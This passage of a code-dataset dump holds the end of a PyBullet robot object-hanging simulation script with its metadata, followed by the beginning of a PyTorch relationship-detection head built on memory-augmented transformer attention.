sim_timestep=0.05, diff_thresh=0.005, max_vel=-1, max_iter=100)\n\n # p.removeAllUserDebugItems()\n\n # for _ in range(int(0.2/sim_timestep)): \n # p.stepSimulation()\n # time.sleep(sim_timestep)\n\n contact = False\n contact_points = p.getContactPoints(obj_id, hook_id)\n contact = True if contact_points != () else False\n\n fname_out = f'hanging_by_trajectory_result_{args.traj_id}_{wpt_num}w_{wpt_dim}d.txt'\n f_out = open(fname_out, 'a')\n f_out.write(f'{hook_name},{obj_name},{traj_i},{1 if contact else 0}\\n')\n f_out.close()\n\n# start_msg = \\\n# '''\n# ======================================================================================\n# this script will execute the hanging process using the collected keypoint trajectories\n# in \n# - [input_root]/[input_dir]/[hook_name].json \n# - [input_root]/[input_dir]/[object_name].json\n\n# dependency :\n# - object folder that contains /[object_name]/base.urdf\n# - hook folder that contains /[hook_name]/base.urdf\n# - the keypoint pose of objects in [input_root]/[input_dir]/[obj_name].json\n# - the keypoint trajectories of hooks in [input_root]/[input_dir]/[hook_name].json\n# - the folder that cantain initial pose of objects in \n# [data_root]/[data_dir]/[hook_name-object_set]/[hook_name-object_name].json\n# note :\n# - you can run this script using ./run.sh hangtraj\n# ======================================================================================\n# '''\n\n# print(start_msg)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--data-root', '-dr', type=str, default='data')\n parser.add_argument('--data-dir', '-dd', type=str, default='everyday_objects_50')\n parser.add_argument('--input-root', '-ir', type=str, default='keypoint_trajectory')\n parser.add_argument('--input-dir', '-id', type=str, default='everyday_objects_50')\n parser.add_argument('--obj', '-obj', type=str, default='hanging_exp_daily_5.json')\n parser.add_argument('--hook', '-hook', type=str, default='Hook_my_bar_easy.json')\n parser.add_argument('--traj_id', '-ti', type=int, default=0)\n parser.add_argument('--wpt_num', '-wn', type=int, default=10)\n parser.add_argument('--wpt_dim', '-wd', type=int, default=3)\n parser.add_argument('--output-root', '-or', type=str, default='demonstration_data')\n parser.add_argument('--output-dir', '-od', type=str, default='')\n parser.add_argument('--save-demo', '-sd', action=\"store_true\")\n parser.add_argument('--save-gif', '-sg', action=\"store_true\")\n args = parser.parse_args()\n main(args)", "repo_name": "Chialiang86/Hanging-Motion-Planning", "sub_path": "hanging_by_trajectory.py", "file_name": "hanging_by_trajectory.py", "file_ext": "py", "file_size_in_byte": 17312, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.dirname", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 18, "usage_type": "call"}, {"api_name": "inspect.getfile", "line_number": 18, "usage_type": "call"}, {"api_name": "inspect.currentframe", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.sys.path.insert", "line_number": 20, "usage_type": "call"}, {"api_name": "os.sys", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 23, "usage_type": "attribute"}, {"api_name": "numpy.copy", "line_number": 28, "usage_type": "call"}, {"api_name": "utils.bullet_utils.get_matrix_from_pose", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.identity", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 66, "usage_type": "attribute"}, {"api_name": "numpy.cross", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.cross", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 70, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation.from_rotvec", "line_number": 75, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation", "line_number": 75, "usage_type": "name"}, {"api_name": "utils.bullet_utils.get_pose_from_matrix", "line_number": 77, "usage_type": "call"}, {"api_name": "pybullet_robot_envs.envs.panda_envs.panda_env.pandaEnv", "line_number": 82, "usage_type": "name"}, {"api_name": "pybullet.stepSimulation", "line_number": 96, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 97, "usage_type": "call"}, {"api_name": "pybullet.getLinkState", "line_number": 99, "usage_type": "call"}, {"api_name": "pybullet.getLinkState", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 101, "usage_type": "call"}, {"api_name": "pybullet.stepSimulation", "line_number": 107, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 108, "usage_type": "call"}, {"api_name": "pybullet.stepSimulation", "line_number": 113, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 116, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 121, "usage_type": "attribute"}, {"api_name": "numpy.divide", "line_number": 121, "usage_type": "call"}, {"api_name": "quaternion.as_quat_array", "line_number": 122, "usage_type": "call"}, {"api_name": "utils.bullet_utils.xyzw2wxyz", "line_number": 122, "usage_type": "call"}, {"api_name": "quaternion.as_quat_array", "line_number": 123, "usage_type": "call"}, {"api_name": "utils.bullet_utils.xyzw2wxyz", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 129, "usage_type": "call"}, {"api_name": "quaternion.slerp_evaluate", "line_number": 130, "usage_type": "call"}, {"api_name": "utils.bullet_utils.wxyz2xyzw", "line_number": 131, "usage_type": "call"}, {"api_name": "quaternion.as_float_array", "line_number": 131, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation.from_matrix", "line_number": 141, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation", "line_number": 141, "usage_type": "name"}, {"api_name": "numpy.linalg.inv", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 141, "usage_type": "attribute"}, {"api_name": "numpy.identity", "line_number": 143, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation.from_rotvec", "line_number": 144, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation", "line_number": 144, "usage_type": "name"}, {"api_name": "numpy.pi", "line_number": 144, "usage_type": "attribute"}, {"api_name": "scipy.spatial.transform.Rotation.from_matrix", "line_number": 146, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation", "line_number": 146, "usage_type": "name"}, {"api_name": "numpy.linalg.inv", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 146, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 148, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path", "line_number": 158, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path", "line_number": 160, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 165, "usage_type": "call"}, {"api_name": "os.path", "line_number": 165, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 166, "usage_type": "call"}, {"api_name": "os.path", "line_number": 166, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 169, "usage_type": "call"}, {"api_name": "os.path", "line_number": 169, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 170, "usage_type": "call"}, {"api_name": "os.path", "line_number": 170, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 171, "usage_type": "call"}, {"api_name": "os.path", "line_number": 171, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 174, "usage_type": "call"}, {"api_name": "json.load", "line_number": 176, "usage_type": "call"}, {"api_name": "json.load", "line_number": 178, "usage_type": "call"}, {"api_name": "pybullet.connect", "line_number": 197, "usage_type": "call"}, {"api_name": "pybullet.DIRECT", "line_number": 197, "usage_type": "attribute"}, {"api_name": "pybullet.resetDebugVisualizerCamera", "line_number": 200, "usage_type": "call"}, {"api_name": "pybullet.resetSimulation", "line_number": 206, "usage_type": "call"}, {"api_name": "pybullet.setPhysicsEngineParameter", "line_number": 207, "usage_type": "call"}, {"api_name": "pybullet.setTimeStep", "line_number": 209, "usage_type": "call"}, {"api_name": "pybullet.setGravity", "line_number": 210, "usage_type": "call"}, {"api_name": "pybullet.loadURDF", "line_number": 217, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 217, "usage_type": "call"}, {"api_name": "os.path", "line_number": 217, "usage_type": "attribute"}, {"api_name": "pybullet_data.getDataPath", "line_number": 217, "usage_type": "call"}, {"api_name": "pybullet_robot_envs.envs.panda_envs.panda_env.pandaEnv", "line_number": 218, "usage_type": "call"}, {"api_name": "pybullet.loadURDF", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path", "line_number": 224, "usage_type": "attribute"}, {"api_name": "pybullet_data.getDataPath", "line_number": 224, "usage_type": "call"}, {"api_name": "utils.bullet_utils.get_matrix_from_pos_rot", "line_number": 227, "usage_type": "call"}, {"api_name": "pybullet.loadURDF", "line_number": 228, "usage_type": "call"}, {"api_name": "pybullet.loadURDF", "line_number": 234, "usage_type": "call"}, {"api_name": "utils.bullet_utils.get_matrix_from_pos_rot", "line_number": 235, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 240, "usage_type": "call"}, {"api_name": "os.path", "line_number": 240, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 241, "usage_type": "call"}, {"api_name": "utils.bullet_utils.get_matrix_from_pos_rot", "line_number": 257, "usage_type": "call"}, {"api_name": "pybullet.stepSimulation", "line_number": 265, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 266, "usage_type": "call"}, {"api_name": "pybullet.resetBasePositionAndOrientation", "line_number": 269, "usage_type": "call"}, {"api_name": "pybullet.stepSimulation", "line_number": 270, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 271, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 272, "usage_type": "call"}, {"api_name": "utils.bullet_utils.get_matrix_from_pos_rot", "line_number": 274, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 280, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 281, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 285, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 285, "usage_type": "attribute"}, {"api_name": "utils.bullet_utils.get_matrix_from_pose", "line_number": 285, "usage_type": "call"}, {"api_name": "utils.bullet_utils.get_pose_from_matrix", "line_number": 286, "usage_type": "call"}, {"api_name": "utils.bullet_utils.get_matrix_from_pos_rot", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 295, "usage_type": "attribute"}, {"api_name": "utils.bullet_utils.get_pos_rot_from_matrix", "line_number": 298, "usage_type": "call"}, {"api_name": "pybullet.stepSimulation", "line_number": 306, "usage_type": "call"}, {"api_name": "pybullet.stepSimulation", "line_number": 309, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 315, "usage_type": "call"}, {"api_name": "utils.bullet_utils.get_pose_from_matrix", "line_number": 321, "usage_type": "call"}, {"api_name": "utils.bullet_utils.get_matrix_from_pose", "line_number": 321, "usage_type": "call"}, {"api_name": "utils.bullet_utils.get_matrix_from_pose", "line_number": 323, "usage_type": "call"}, {"api_name": "utils.bullet_utils.get_pose_from_matrix", "line_number": 324, "usage_type": "call"}, {"api_name": "pybullet.stepSimulation", "line_number": 329, "usage_type": "call"}, {"api_name": "pybullet.stepSimulation", "line_number": 333, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 334, "usage_type": "call"}, {"api_name": "pybullet.getLinkState", "line_number": 342, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation.from_quat", "line_number": 343, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation", "line_number": 343, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 344, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 344, "usage_type": "call"}, {"api_name": "pybullet.getContactPoints", "line_number": 356, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 387, "usage_type": "call"}]}
+{"seq_id": "4687325756", "text": "# modified by Sherif Abdelkarim on Jan 2020\n\nimport numpy as np\nfrom numpy import linalg as la\nimport math\nimport logging\nimport json\n\nimport torch\nfrom torch import nn\nfrom torch.nn import init\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport nn as mynn\n\nfrom core.config import cfg\nimport utils.net as net_utils\nfrom modeling.sparse_targets_rel import FrequencyBias\nfrom utils import focal_loss\nfrom .transformer import LayerNorm, Conv1D_, gelu\nimport copy\nfrom .image_encoder import MemoryAugmentedEncoder\nfrom .attention import ScaledDotProductAttentionMemory\n\n\nlogger = logging.getLogger(__name__)\n\n\n\nclass Attention(nn.Module):\n def __init__(self, n_state=768, n_head=12, n_emb=768):\n super(Attention, self).__init__()\n self.n_head = n_head\n self.n_emb = n_emb\n self.c_attn = Conv1D_(n_state * 3, n_state)\n self.c_proj = Conv1D_(n_state, n_state)\n self.split_size = n_state\n \n self.m = 100\n\n self.memory_features = nn.Parameter(torch.FloatTensor(1, self.m, n_state))\n self.mem_attn = Conv1D_(n_state * 2, n_state)\n self.alpha = nn.Linear( n_state + n_state , n_state)\n\n\n self.attn_pdrop = nn.Dropout(0.1)\n\n def _attn(self, q, k, v):\n w = torch.matmul(q, k)\n\n w = nn.Softmax(dim=-1)(w)\n self.w = self.attn_pdrop(w)\n\n return w, torch.matmul(w, v)\n\n def merge_heads(self, x):\n x = x.permute(0, 2, 1, 3).contiguous()\n new_x_shape = x.size()[:-2] + (x.size(-2) * x.size(-1),)\n return x.view(*new_x_shape)\n\n def split_heads(self, x, k=False):\n new_x_shape = x.size()[:-1] + (self.n_head, x.size(-1) // self.n_head)\n x = x.view(*new_x_shape) # in Tensorflow implem: fct split_states\n if k:\n return x.permute(0, 2, 3, 1) # (batch, head, head_features, seq_length)\n else:\n return x.permute(0, 2, 1, 3) # (batch, head, seq_length, head_features)\n\n def forward(self, x):\n\n x1 = self.c_attn(x)\n query, key, value = x1.split(self.split_size, dim=2)\n\n b_s , nq = query.shape[:2]\n\n\n query = self.split_heads(query)\n key = self.split_heads(key, k=True)\n value = self.split_heads(value)\n\n\n _,a = self._attn(query, key, value)\n a = self.merge_heads(a)\n\n memory = self.memory_features.expand(b_s, self.m, self.split_size)\n\n memory = self.mem_attn(memory)\n memory_key , memory_value = memory.split(self.split_size,dim=2)\n\n\n m_update_key = self.split_heads(memory_key, k=True)\n m_update_value = self.split_heads(memory_value)\n\n\n _, a1 = self._attn(query, m_update_key, m_update_value)\n a1 = self.merge_heads(a1)\n\n alpha = torch.sigmoid(self.alpha(torch.cat([a, a1],-1)))\n\n\n a = alpha * a + (1-alpha)*a1\n \n\n a = self.c_proj(a)\n return a\n\nclass Enc_Dec_Attention(nn.Module):\n def __init__(self, n_state=768, n_head =12, n_emb = 768):\n super(Enc_Dec_Attention,self).__init__()\n self.n_head = n_head\n self.n_emb = n_emb\n self.c_attn = Conv1D_(n_state * 3, n_state)\n self.c_proj = Conv1D_(n_state , n_state)\n\n self.fc_q = nn.Linear(n_state, n_emb)\n self.fc_k = nn.Linear(n_state, n_emb)\n self.fc_v = nn.Linear(n_state, n_emb)\n\n self.attn_dropout = nn.Dropout(0.2)\n self.init_weights()\n \n def init_weights(self):\n\n nn.init.xavier_uniform_(self.fc_q.weight)\n nn.init.xavier_uniform_(self.fc_k.weight)\n nn.init.xavier_uniform_(self.fc_v.weight)\n\n nn.init.constant_(self.fc_q.bias, 0)\n nn.init.constant_(self.fc_k.bias, 0)\n nn.init.constant_(self.fc_v.bias, 0)\n\n\n \n def _attn(self, q, k, v , enc_dec_attention):\n\n nk = k.shape[-1]\n w = torch.matmul(q,k)\n\n w = w / math.sqrt(v.size(-1))\n\n nd, ns = w.size(-2), w.size(-1)\n\n # b = self.bias[-2], w.size(-1)\n\n if enc_dec_attention is not None:\n w = w.masked_fill(enc_dec_attention, -10000.0)\n\n w = nn.Softmax(dim=-1)(w)\n w = self.attn_dropout(w)\n return torch.matmul(w, v)\n\n\n\n def merge_heads(self, x):\n x = x.permute(0, 2, 1, 3).contiguous()\n new_x_shape = x.size()[:-2] + (x.size(-2) * x.size(-1),)\n return x.view(*new_x_shape) # in Tensorflow implem: fct merge_states\n\n\n def split_heads(self, x, k=False):\n new_x_shape = x.size()[:-1] + (self.n_head, x.size(-1) // self.n_head)\n x = x.view(*new_x_shape) # in Tensorflow implem: fct split_states\n if k:\n return x.permute(0, 2, 3, 1) # (batch, head, head_features, seq_length)\n else:\n return x.permute(0, 2, 1, 3) # (batch, head, seq_length, head_features) \n\n\n def forward(self, x, encoder_output=None, mask_encoder=None):\n\n query = self.fc_q(x)\n encoder_key = self.fc_k(encoder_output)\n encoder_value = self.fc_v(encoder_output)\n query = self.split_heads(query)\n encoder_key = self.split_heads(encoder_key, k=True)\n encoder_value = self.split_heads(encoder_value)\n\n\n a = self._attn(query, encoder_key,encoder_value,mask_encoder)\n a = self.merge_heads(a)\n a = self.c_proj(a)\n\n\n return a\n\n\n\n\nclass MLP(nn.Module):\n def __init__(self, n_state, n_emb): # in MLP: n_state=3072 (4 * n_embd)\n super(MLP, self).__init__()\n nx = n_emb\n self.c_fc = Conv1D_(n_state, nx)\n self.c_proj = Conv1D_(nx, n_state)\n self.act = gelu\n\n def forward(self, x):\n h = self.act(self.c_fc(x))\n h2 = self.c_proj(h)\n return h2\n\n\nclass Block(nn.Module):\n def __init__(self, n_state, n_head, n_emb):\n super(Block, self).__init__()\n self.n_state = n_state\n self.n_head = n_head\n self.n_emb = n_emb\n\n self.ln_1 = LayerNorm(n_emb, eps=1e-5)\n self.attn = Attention(n_state, n_head, n_emb)\n self.ln_2 = LayerNorm(n_emb, eps=1e-5)\n self.mlp = MLP(4 * n_state, n_emb)\n self.resid_pdrop = nn.Dropout(0.1)\n\n\n self.enc_dec_attn = Enc_Dec_Attention(n_state, n_head, n_emb)\n self.fc_alpha1 = nn.Linear(n_state + n_state, n_state)\n self.fc_alpha2 = nn.Linear(n_state+ n_state, n_state)\n\n\n\n def forward(self, x, encoder_features, mask_encoder):\n\n\n #[25, 17, 768]) x shape\n #torch.Size([25, 3, 50, 768]) encoder output shape\n #torch.Size([25, 1, 1, 50]) mask encoder shape\n #torch.Size([25, 17, 768]) a shape\n\n \n self_attention = self.attn(self.ln_1(x))\n a = x + self_attention\n\n a = self.resid_pdrop(a)\n\n\n enc_att1 = self.enc_dec_attn(x = self.ln_1(a), encoder_output = self.ln_1(encoder_features[:,0]), mask_encoder = mask_encoder)\n enc_att2 = self.enc_dec_attn(x = self.ln_1(a), encoder_output = self.ln_1(encoder_features[:,1]), mask_encoder = mask_encoder)\n\n alpha1 = torch.sigmoid(self.fc_alpha1(torch.cat([a, enc_att1],-1)))\n alpha2 = torch.sigmoid(self.fc_alpha2(torch.cat([a, enc_att2],-1)))\n\n enc_att1 = alpha1 * a + (1-alpha1) * enc_att1\n enc_att2 = alpha2 * a + (1-alpha2) * enc_att2\n\n \n\n a = (enc_att1 + enc_att2 )/ np.sqrt(2)\n\n m = self.mlp(self.ln_2(a))\n\n output = a + m\n output = self.resid_pdrop(output)\n\n return output\n\n\nclass MultiHeadModel(nn.Module):\n def __init__(self, n_layer, n_state, n_head, n_embd):\n super(MultiHeadModel, self).__init__()\n self.n_layer = n_layer\n self.n_state = n_state\n self.n_head = n_head\n self.n_embd = n_embd\n\n self.language_fc = nn.Linear(300, n_embd)\n self.visual_fc = nn.Linear(1024, n_embd)\n\n self.wpe = nn.Embedding(5, n_embd)\n self.wte = nn.Embedding(5, n_embd)\n block = Block(n_state, n_head, n_embd)\n self.h = nn.ModuleList([copy.deepcopy(block) for _ in range(n_layer)])\n\n self.dropout = nn.Dropout(0.1)\n\n self.linear_projection = nn.Linear(n_embd, 1024)\n self.layer_norm = nn.LayerNorm(1024, 1e-5)\n\n def data_transformation(self, sub_label, obj_label, sub_visual, obj_visual, label_visual):\n # print(\"before\")\n # print(sub_label.shape, obj_label.shape, sub_visual.shape, obj_visual.shape, label_visual.shape)\n sub_label = self.language_fc(sub_label)\n sub_label = sub_label.reshape(-1, 1, self.n_embd)\n obj_label = self.language_fc(obj_label)\n obj_label = obj_label.reshape(-1, 1, self.n_embd)\n\n sub_visual = self.visual_fc(sub_visual)\n sub_visual = sub_visual.reshape(-1, 1, self.n_embd)\n obj_visual = self.visual_fc(obj_visual)\n obj_visual = obj_visual.reshape(-1, 1, self.n_embd)\n label_visual = self.visual_fc(label_visual)\n label_visual = label_visual.reshape(-1, 1, self.n_embd)\n try:\n input_ids = torch.cat([sub_label, obj_label, sub_visual, obj_visual, label_visual], -2)\n except:\n print(sub_label.shape)\n print(obj_label.shape)\n print(sub_visual.shape)\n print(obj_visual.shape)\n print(label_visual.shape)\n\n position_ids = torch.arange(5, dtype=torch.long, device=sub_label.device)\n position_ids = position_ids.unsqueeze(0).expand_as(input_ids[:, :, 0])\n\n position_ids = self.wpe(position_ids)\n\n type_ids = torch.tensor([0, 0, 1, 1, 1], dtype=torch.long, device=sub_label.device)\n type_ids = type_ids.unsqueeze(0).expand_as(input_ids[:, :, 0])\n type_ids = self.wte(type_ids)\n\n input_ids = input_ids + position_ids + type_ids\n return input_ids\n\n\n\n\n\n def data_transformation_only_visual(self, sub_visual, obj_visual, label_visual):\n # print(\"before\")\n # print(sub_label.shape, obj_label.shape, sub_visual.shape, obj_visual.shape, label_visual.shape)\n\n\n sub_visual = self.visual_fc(sub_visual)\n sub_visual = sub_visual.reshape(-1, 1, self.n_embd)\n obj_visual = self.visual_fc(obj_visual)\n obj_visual = obj_visual.reshape(-1, 1, self.n_embd)\n label_visual = self.visual_fc(label_visual)\n label_visual = label_visual.reshape(-1, 1, self.n_embd)\n try:\n input_ids = torch.cat([ sub_visual, obj_visual, label_visual], -2)\n except:\n\n print(sub_visual.shape)\n print(obj_visual.shape)\n print(label_visual.shape)\n\n position_ids = torch.arange(3, dtype=torch.long, device=sub_visual.device)\n position_ids = position_ids.unsqueeze(0).expand_as(input_ids[:, :, 0])\n\n position_ids = self.wpe(position_ids)\n\n type_ids = torch.tensor([ 1, 1, 1], dtype=torch.long, device=sub_visual.device)\n type_ids = type_ids.unsqueeze(0).expand_as(input_ids[:, :, 0])\n type_ids = self.wte(type_ids)\n\n input_ids = input_ids + position_ids + type_ids\n return input_ids\n\n\n\n def forward(self, sub_label, obj_label, sub_visual, obj_visual, label_visual, encoder_features, encoder_mask):\n if sub_label is None:\n hidden_states = self.data_transformation_only_visual(sub_visual, obj_visual, label_visual)\n \n \n\n for block in self.h:\n hidden_states = block(hidden_states, encoder_features, encoder_mask)\n\n hidden_states = self.linear_projection(hidden_states)\n\n hidden_states = self.layer_norm(hidden_states)\n\n\n\n return hidden_states[:, 0, :], hidden_states[:, 1, :], hidden_states[:, 2, :]\n\n\n\n else:\n hidden_states = self.data_transformation(sub_label, obj_label, sub_visual, obj_visual, label_visual)\n\n \n for block in self.h: \n hidden_states = block(hidden_states)\n\n hidden_states = self.linear_projection(hidden_states)\n\n hidden_states = self.layer_norm(hidden_states)\n\n\n return hidden_states[:, 2, :], hidden_states[:, 3, :], hidden_states[:, 4, :]\n\n\n\n\n\n\n\n\n\n\nclass reldn_head(nn.Module):\n def __init__(self, dim_in, all_obj_vecs=None, all_prd_vecs=None):\n super().__init__()\n\n num_prd_classes = cfg.MODEL.NUM_PRD_CLASSES + 1\n\n if cfg.MODEL.RUN_BASELINE:\n # only run it on testing mode\n self.freq_bias = FrequencyBias(cfg.TEST.DATASETS[0])\n return\n\n ### what are these all obj vecs\n self.obj_vecs = all_obj_vecs\n self.prd_vecs = all_prd_vecs\n\n # add subnet\n self.prd_feats = nn.Sequential(\n nn.Linear(dim_in, 1024),\n nn.LeakyReLU(0.1))\n self.prd_vis_embeddings = nn.Sequential(\n nn.Linear(1024 * 3, 1024),\n nn.LeakyReLU(0.1),\n nn.Linear(1024, 1024))\n # if not cfg.MODEL.USE_SEM_CONCAT:\n # self.prd_sem_embeddings = nn.Sequential(\n # nn.Linear(cfg.MODEL.INPUT_LANG_EMBEDDING_DIM, 1024),\n # nn.LeakyReLU(0.1),\n # nn.Linear(1024, 1024))\n # else:\n # self.prd_sem_hidden = nn.Sequential(\n # nn.Linear(cfg.MODEL.INPUT_LANG_EMBEDDING_DIM, 1024),\n # nn.LeakyReLU(0.1),\n # nn.Linear(1024, 1024))\n # self.prd_sem_embeddings = nn.Linear(3 * 1024, 1024)\n\n self.prd_sem_embeddings = nn.Sequential(\n nn.Linear(cfg.MODEL.INPUT_LANG_EMBEDDING_DIM, 1024),\n nn.LeakyReLU(0.1),\n nn.Linear(1024, 1024))\n\n self.so_vis_embeddings = nn.Linear(dim_in // 3, 1024)\n self.so_sem_embeddings = nn.Sequential(\n nn.Linear(cfg.MODEL.INPUT_LANG_EMBEDDING_DIM, 1024),\n nn.LeakyReLU(0.1),\n nn.Linear(1024, 1024))\n\n if cfg.MODEL.USE_FREQ_BIAS:\n # Assume we are training/testing on only one dataset\n if len(cfg.TRAIN.DATASETS):\n self.freq_bias = FrequencyBias(cfg.TRAIN.DATASETS[0])\n else:\n self.freq_bias = FrequencyBias(cfg.TEST.DATASETS[0])\n\n self.multi_head_attention = MultiHeadModel(int(cfg.MODEL.ENCODER_LAYER), 768, 12, 768)\n\n self.image_encoder = MemoryAugmentedEncoder(2, 0, attention_module=ScaledDotProductAttentionMemory,\n attention_module_kwargs={'m': 0})\n\n self._init_weights()\n\n def _init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n mynn.init.XavierFill(m.weight)\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n for p in self.multi_head_attention.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n \n for p in self.image_encoder.parameters():\n if p.dim() >1:\n nn.init.xavier_uniform_(p)\n\n def forward(self, spo_feat, sbj_labels=None, obj_labels=None, sbj_feat=None, obj_feat=None,all_unique_features = None):\n\n\n \n\n device_id = spo_feat.get_device()\n if sbj_labels is not None:\n sbj_labels = Variable(torch.from_numpy(sbj_labels.astype('int64'))).cuda(device_id)\n if obj_labels is not None:\n obj_labels = Variable(torch.from_numpy(obj_labels.astype('int64'))).cuda(device_id) \n\n\n\n if cfg.MODEL.RUN_BASELINE:\n assert sbj_labels is not None and obj_labels is not None\n prd_cls_scores = self.freq_bias.rel_index_with_labels(torch.stack((sbj_labels, obj_labels), 1))\n prd_cls_scores = F.softmax(prd_cls_scores, dim=1)\n return prd_cls_scores, None, None, None, None, None\n\n if spo_feat.dim() == 4:\n spo_feat = spo_feat.squeeze(3).squeeze(2)\n\n sbj_vis_embeddings = self.so_vis_embeddings(sbj_feat)\n obj_vis_embeddings = self.so_vis_embeddings(obj_feat)\n\n prd_hidden = self.prd_feats(spo_feat)\n\n\n\n\n\n # feed the data into the image encoder \n enc_output, mask_enc = self.image_encoder(all_unique_features)\n # print(enc_output.shape, \"encoder output shape \")\n # print(mask_enc.shape, \"mask encoder shape\")\n\n\n\n\n\n\n '''\n \n until here, we can obtain the subject visual embeddings, object visual embeddings, and predicate hidden states\n \n '''\n '''\n the self attention for the sub obj and relation embeddings\n \n '''\n\n\n\n\n ## get sbj vectors and obj vectors\n sbj_vecs = self.obj_vecs[sbj_labels] # (#bs, cfg.MODEL.INPUT_LANG_EMBEDDING_DIM)\n sbj_vecs = Variable(torch.from_numpy(sbj_vecs.astype('float32'))).cuda(device_id)\n\n obj_vecs = self.obj_vecs[obj_labels] # (#bs, cfg.MODEL.INPUT_LANG_EMBEDDING_DIM)\n obj_vecs = Variable(torch.from_numpy(obj_vecs.astype('float32'))).cuda(device_id)\n\n\n sbj_vis_embeddings, obj_vis_embeddings, prd_hidden = self.multi_head_attention(None, None,\n sbj_vis_embeddings,\n obj_vis_embeddings, prd_hidden, enc_output, mask_enc)\n\n\n\n\n\n '''\n all the object and subject word embedding to formalize the object vectors\n '''\n ds_obj_vecs = self.obj_vecs\n ds_obj_vecs = Variable(torch.from_numpy(ds_obj_vecs.astype('float32'))).cuda(device_id)\n so_sem_embeddings = self.so_sem_embeddings(ds_obj_vecs)\n\n so_sem_embeddings = F.normalize(so_sem_embeddings, p=2, dim=1) # (#prd, 